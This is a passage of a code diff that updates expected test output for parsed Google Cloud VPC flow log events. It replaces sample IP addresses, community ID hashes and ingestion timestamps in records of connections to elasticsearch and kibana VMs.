"{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740491697Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -11496,9 +11496,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65317, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -11512,7 +11512,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KUhb7O2JuCr67sFOvEo0t6q1bx0=", + "community_id": "1:Z1gkzsFxPRA+wdZ4AaO0v0oQz34=", "bytes": 92566, "transport": "tcp", "type": "ipv4", @@ -11527,7 +11527,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -11551,8 +11551,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868846100Z", - "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391787400Z", + "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740491697Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -11579,18 +11579,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33692, "bytes": 66094, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 360 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ICaRxvQCM8Iv02SAaUpscf0dmFk=", + "community_id": "1:JliXl736rywggK/Xuo92yo5WPuY=", "bytes": 66094, "name": "default", "transport": "tcp", @@ -11612,7 +11612,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -11649,8 +11649,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868849100Z", - "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391792200Z", + "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", "end": "2019-06-14T03:49:59.565137912Z", @@ -11679,17 +11679,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65262, "bytes": 4900, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 542 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RtfThXVVNPvXxMgtvtqlB4QmIlQ=", + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", "bytes": 4900, "transport": "tcp", "type": "ipv4", @@ -11703,7 +11703,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -11725,8 +11725,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868852100Z", - "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391796700Z", + "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", "end": "2019-06-14T03:49:56.220741828Z", @@ -11747,9 +11747,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 52328, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -11763,7 +11763,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EE4Jx/GklVta9XikBj43wQU3qJM=", + "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -11778,7 +11778,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -11802,8 +11802,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868855200Z", - "original": "{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391802200Z", + "original": "{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:42:20.842840991Z", "end": "2019-06-14T03:42:20.952481728Z", @@ -11830,18 +11830,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33552, "bytes": 63280, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 361 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:r7WME9xMisADgziCEygFYe5e1kY=", + "community_id": "1:RgpWxKDKI4bxYgUqX3Z0ZpipsO4=", "bytes": 63280, "name": "default", "transport": "tcp", @@ -11863,7 +11863,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -11900,8 +11900,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868858200Z", - "original": "{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391807700Z", + "original": "{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", "end": "2019-06-14T03:49:55.213081491Z", @@ -11924,9 +11924,9 @@ "as": { "number": 24940 }, - "address": "198.51.100.239", + "address": "67.43.156.14", "port": 37292, - "ip": "198.51.100.239" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -11940,7 +11940,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:qQCuSUtf/LXRt0TJF/oFikmD5p4=", + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", "bytes": 774029, "transport": "tcp", "type": "ipv4", @@ -11955,7 +11955,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.239" + "67.43.156.14" ] }, "gcp": { @@ -11979,8 +11979,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868861300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"198.51.100.239\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391812600Z", + "original": "{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", "end": "2019-06-14T03:49:35.841633589Z", @@ -12007,18 +12007,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 359272, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 66 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RJ5OB/OF2Dh8aqt0X5ikvUiYbOE=", + "community_id": "1:OhbIPr/28Fsp+gsHSdoT+T8vBZA=", "bytes": 359272, "name": "default", "transport": "tcp", @@ -12040,7 +12040,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -12074,8 +12074,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868864300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391817Z", + "original": "{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", "end": "2019-06-14T03:49:37.933338264Z", @@ -12104,17 +12104,17 @@ "as": { "number": 24940 }, - "address": "198.51.100.239", + "address": "67.43.156.14", "port": 37292, "bytes": 310476, - "ip": "198.51.100.239", + "ip": "67.43.156.14", "packets": 214 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:qQCuSUtf/LXRt0TJF/oFikmD5p4=", + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", "bytes": 310476, "transport": "tcp", "type": "ipv4", @@ -12128,7 +12128,7 @@ }, "related": { "ip": [ - "198.51.100.239", + "67.43.156.14", "10.139.99.242" ] }, @@ -12153,8 +12153,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868867400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.239\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391822500Z", + "original": "{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", "end": "2019-06-14T03:49:35.841633589Z", @@ -12175,9 +12175,9 @@ "as": { 